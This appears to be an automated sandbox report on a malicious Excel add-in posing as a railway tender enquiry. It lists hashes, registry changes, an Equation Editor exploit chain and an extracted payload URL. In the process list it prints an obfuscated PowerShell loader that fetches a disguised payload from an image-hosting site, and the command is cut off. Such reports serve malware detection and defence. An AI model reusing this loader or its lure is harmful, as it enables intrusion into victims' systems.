Analysis
-
max time kernel
117s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
07-11-2023 15:28
Static task
static1
Behavioral task
behavioral1
Sample
Tender Enquiry UAE-Oman Railway Link Project.xlam
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
Tender Enquiry UAE-Oman Railway Link Project.xlam
Resource
win10v2004-20231025-en
General
-
Target
Tender Enquiry UAE-Oman Railway Link Project.xlam
-
Size
673KB
-
MD5
6c41c35e408a18d8e2d98eb3df016e87
-
SHA1
4668e6de0070d0a92c63990099908029e45dd1ab
-
SHA256
d9d0ce8ddb0663aacfbc594241b9ab4785419baf302563b8b2eb5d2249d963dd
-
SHA512
db50ac69c927d3a7a2e904e7202a10d46b0fbc2e514444e3a87a44c60ec0380d398d9eda7c9ac239fcf5f2275500c53771a3ce4b8e11fd960849b9140c61c1d9
-
SSDEEP
12288:HsLFsXoGaZop0qBD5xOQ5A09Fz5eDH/SxJigHkD3D5eeb6p9XjRe:H2sXoNKLNxO94sqzpS3R6v4
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750
https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 4 2092 EQNEDT32.EXE 7 2804 WScript.exe 9 1828 powershell.exe 11 1828 powershell.exe 13 1828 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2092 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1988 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2664 powershell.exe 1828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 1828 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1988 EXCEL.EXE 1988 EXCEL.EXE 1988 EXCEL.EXE 1988 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2092 wrote to memory of 2804 2092 EQNEDT32.EXE 30 PID 2092 wrote to memory of 2804 2092 EQNEDT32.EXE 30 PID 2092 wrote to memory of 2804 2092 EQNEDT32.EXE 30 PID 2092 wrote to memory of 2804 2092 EQNEDT32.EXE 30 PID 2804 wrote to memory of 2664 2804 WScript.exe 33 PID 2804 wrote to memory of 2664 2804 WScript.exe 33 PID 2804 wrote to memory of 2664 2804 WScript.exe 33 PID 2804 wrote to memory of 2664 2804 WScript.exe 33 PID 2664 wrote to memory of 1828 2664 powershell.exe 36 PID 2664 wrote to memory of 1828 2664 powershell.exe 36 PID 2664 wrote to memory of 1828 2664 powershell.exe 36 PID 2664 wrote to memory of 1828 2664 powershell.exe 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Tender Enquiry UAE-Oman Railway Link Project.xlam"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1988
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\unxggyus.vbs"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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